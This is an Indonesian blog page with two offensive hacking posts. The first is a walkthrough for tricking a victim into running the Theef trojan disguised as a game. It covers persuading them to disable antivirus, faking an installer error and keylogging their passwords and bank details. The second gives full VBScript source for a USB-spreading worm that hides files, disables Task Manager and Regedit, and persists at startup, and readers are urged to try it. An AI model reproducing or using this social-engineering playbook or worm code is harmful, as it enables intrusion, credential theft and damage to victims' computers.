BLOGGER TEMPLATES AND TWITTER BACKGROUNDS

Senin, 24 Mei 2010

Membuat BackDoor Trojan Menggunakan Theef

Theef adalah hacking tools yang terbaik yang saya pernah digunakan. Hal ini mudah digunakan dan intuitif, tetapi terbaik dari semua itu memberi Anda banyak pilihan. Inilah sebabnya mengapa Anda akan belajar menggunakan tool ini.


Jadi mari kita mulai. sebelumya kita menyiapkan sesajen-sesajennya antara lain :
  1. Secangkir energen
  2. Gorengan
  3. Theef Download disini atau disini atau disini
  4. Yang utama Anda perlu target.
Ini harus relatif mudah untuk menemukannya, pasti sebagian besar Anda membaca artikel ini telah memiliki seseorang dalam pikiran yang ingin Anda hack. Jika tidak ada gunakan komputer kedua hanya agar Anda dapat mencoba trik ini. Untuk tujuan tutorial kita, korban kita bernama Bob. Dan kita akan berpura-pura bahwa kita memberikan dia sebuah installer untuk sebuah permainan yang disebut Game awesomegame atau apalah terserah anda.

Sekarang Anda perlu meyakinkan korban Anda untuk mematikan Anti-Virus mereka jika mereka punya. Hal ini karena program Anti-Virus umumnya akan mendeteksi Theef sebagai virus dan menghapusnya. Meyakinkan seseorang untuk mematikan Anti-Virus mereka merupakan tugas yang sulit, sebagian besar waktu Anda hanya dapat memberitahu mereka sesuatu di sepanjang baris, contoh :

"Your Anti-Virus says awesomegame Game is a virus, but it isn’t so don’t worry about it"

Orang-orang yang mudah tertipu akan percaya Anda tidak akan menjangkiti dengan virus. Gunakan ini untuk keuntungan Anda

Hal berikutnya yang harus kita lakukan adalah mengkonfigurasi program. Ini adalah tugas yang mudah untuk dilakukan. Dan untuk memudahkan saya akan memandu Anda menggunakan screen shot untuk membantu menampilkan item yang mungkin anda ingin mengubahnya.

Pertama membuat copian dari server Theef. Server Theef bernama Server210.exe. Nama salinan dari awesomegame.exe server.




Screenshot awesomegame.exe menunjukkan ini adalah salinan dari Server210.exe

Sekarang kita memiliki copian untuk bekerja serta membuka editor. Editor server bernama Editserver210.exe. Setelah dibuka Anda akan disajikan dengan jendela yang terlihat seperti ini:



Screenshot dari Theef Server Editor tanpa server load.

Dari sini kita perlu membuka server kita untuk mengedit dengan menggunakan tombol Load. Setelah server di-load beberapa values akan kita isi ke dalam kotak. Nilai pada halaman pertama dapat dibiarkan sendirian. download disini untuk melihat daftar rinci tentang theef, tapi untuk tutorial ini kita hanya akan fokus pada apa yang dibutuhkan untuk memberikan Bob virus.

Untuk membuatnya tampak masuk akal bahwa Awesome Game memang permainan dan bukan virus kita perlu setup pesan error palsu. Untuk melakukan hal ini klik Setup-> False Error. Pada layar ini centang kotak enable fake error on installation lalu isi kotak berlabel Input teks berikut
The installer failed to run! lihat seperti ini!.



Screenshot menunjukkan False Error Screen dari Theef Server Editor

Sekarang server siap untuk disimpan dan dikirim. Klik tombol save untuk menyimpan konfigurasi server. status Bar akan mengatakan “Finished writing new server settings.” Sekarang Anda dapat menutup dari editor server.

Langkah selanjutnya adalah umumnya yang paling sulit. Anda harus mengirim virus (dalam kasus ini awesomegame.exe) untuk korban Anda dan membuat mereka untuk menjalankannya. Sekarang kita akan mengirim Bob sebuah permainan dengan nama Awesome Game. Bob tidak tahu bahwa Awesome Game bukan permainan, tetapi virus kami. Kami telah mengirim Bob Awesome Game menggunakan Windows Live Messenger. Jika korban Anda menggunakan Vista (seperti Bob) maka Anda akan perlu mereka menjalankan virus menggunakan hak Admin.

Sekarang bahwa Anda telah memberi mereka virus yang menyenangkan yang sebenarnya dapat dimulai. Dari sini kita melakukan segalanya dalam Theef Klien. Ini adalah program yang Anda gunakan untuk mengendalikan virus. buka file bernama Client210.exe. Anda harus membukanya saat ini.



Screenshot dari Theef Klien sebelum terhubung ke server.

Anda akan membutuhkan untuk mendapatkan alamat IP korban pada saat ini sehingga Anda dapat terhubung ke komputer mereka. Ini adalah tugas yang mudah dilakukan, dan ada banyak cara untuk mencapainya. Sebagai contoh kami telah meyakinkan Bob untuk pergi ke http://privax.us/ip-test/ dan membaca IP Address nya ke kita dari halaman tersebut. kitajuga bisa mendapatkan dia untuk menjalankan ip-config atau melakukan banyak hal lainnya. Jika Anda tidak tahu apa Alamat IP, langsung saja mereka untuk Privax IP Test dan meminta mereka untuk mengirimkan alamat IP dari halaman.

Dengan menggunakan salah satu metode tersebut saya telah memutuskan bahwa IP Address Bob adalah 127.0.0.1 (harap dicatat korban Alamat IP Anda akan berbeda dari alamat yang saya telah digunakan dalam contoh ini).

Sekarang saya masukkan ke dalam kotak input IP pada klien Theef dan tekan Connect. Jika Anda memiliki alamat yang benar dan mereka telah menjalankan virus tersebut Anda akan melihat sesuatu mirip dengan berikut muncul di kotak log:

[15:56:44] Attempting connection with 127.0.0.1
[15:56:44] Connection established with 127.0.0.1
[15:56:44] Connection accepted
[15:56:44] Connected to transfer port

jika Anda tidak memiliki IP Address mereka yang benar atau mereka tidak menjalankan virus Anda maka akan terlihat sebagai berikut:

[15:57:37] Attempting connection with 127.0.0.1
[15:57:58] Connection failed (Error: 10060)

Sekarang kita telah terhubung, kita dapat mulai mengambil melakukan hal-hal. Ada banyak fitur dalam Theef jadi saya hanya akan mencakup sebagian kecil dari program theef. Perlu diketahui juga bahwa tidak semua fitur Theef bekerja , dan fitur yang lebih sedikit akan bekerja di Vista daripada di XP.

Salah satu fitur yang paling berguna dari Theef adalah keylogger, yang tersedia di bawah menu Spy. Setelah memilih tombol keylogger akan terbuka seperti pada gambar.



Screenshot dari Theef keylogger sebelum log tombol apapun.

Setelah Anda mengklik tombol Start pada jendela ini Anda akan mulai melihat segala sesuatu yang mereka ketik di komputer mereka. Hal ini sangat berguna karena menunjukkan Anda pernah sandi mereka masuk. Ini adalah satu stop shop untuk mendapatkan password mereka untuk segala sesuatu dan hal-hal seperti nomor rekening bank mereka, dll

Ada fitur lain dalam Theef yang dapat digunakan. Bawah dari Menu Kontrol ada tombol yang berlabel Power. Jika Anda mengklik bahwa Anda akan melihat sebuah Open / Close CD-ROM Drive tombol. Kebanyakan orang panik jika CD-ROM Drive mereka secara acak membuka dan menutup tanpa mereka melakukan apa-apa

Jumat, 21 Mei 2010

Worm JaduL versi VHC

Kali ini kita akan membuat script worm, emang c jadul tapi lumayan mengganggu. buat para master-master maaf ya jangan ganggu ya satu guru satu ilmu jangan saling ganggu ya!

Buat para newbie termasuk ane juga c, silahkan dicoba dan di praktekin sekalian ya.
ada pun caranya sebagai berikut :
ini mantra worm ala VHC :
1. Buka notepad
2. Tulis dan simpan source code dibawah.
3. Lalu di save as type pilih “All Files (*.*).
4. Simpan dengan nama : vhc.vbs.


‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,vhc,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe vhc.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- vhc.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- vhc.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- vhc.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives

‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\vhc.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\vhc.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\vhc.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set vhc = createobject(”WScript.Shell”)

‘//–Manipulasi – Ubah Title Internet Explorer menjadi Virus & Hack Community–//
vhc.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” Virus & Hack Community “

‘//–Manipulasi – Set agar file hidden tidak ditampilkan di Explorer–//
vhc.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manipulasi – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
vhc.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
vhc.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
vhc.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
vhc.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
vhc.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manipulasi – Disable klik kanan–//
vhc.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manipulasi – Munculkan Pesan Setiap Windows Startup–//
vhc.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm vhc. Variant from Virus & HAck Community, don’t panic all data are safe.”

‘//–Manipulasi – Aktif setiap Windows Startup–//
vhc.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- vhc.vbs “

‘//–Manipulasi – Ubah RegisteredOwner dan Organization–//
vhc.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
vhc.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”vhc”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

download virusnya disini

Biar lebih nendang lg virus itu bisa disimpan dalam starup caranya :
1. Extrak file yg sudah di download atau di copy paste script tadi di notepad
2. Klik Start -> All Programs -> Starup, klik kanan starup tadi explore
3. Ccopy paste file vhc.vbs di starup explore tadi
4. Sembunyikan file tadi klik kanan properties -> hidden
Selamat mencoba dan good luck!